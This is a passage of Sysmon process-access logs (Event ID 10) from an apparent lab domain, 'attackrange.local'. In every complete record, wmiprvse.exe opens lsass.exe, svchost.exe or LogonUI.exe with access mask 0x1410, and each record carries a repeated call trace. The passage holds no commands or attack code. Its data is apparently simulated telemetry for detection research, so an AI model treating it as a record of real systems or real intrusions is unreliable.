4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D1A90000}\r\nTargetProcessId: 1004\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D1A90000}","TargetProcessId":"1004","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.565\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.565","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec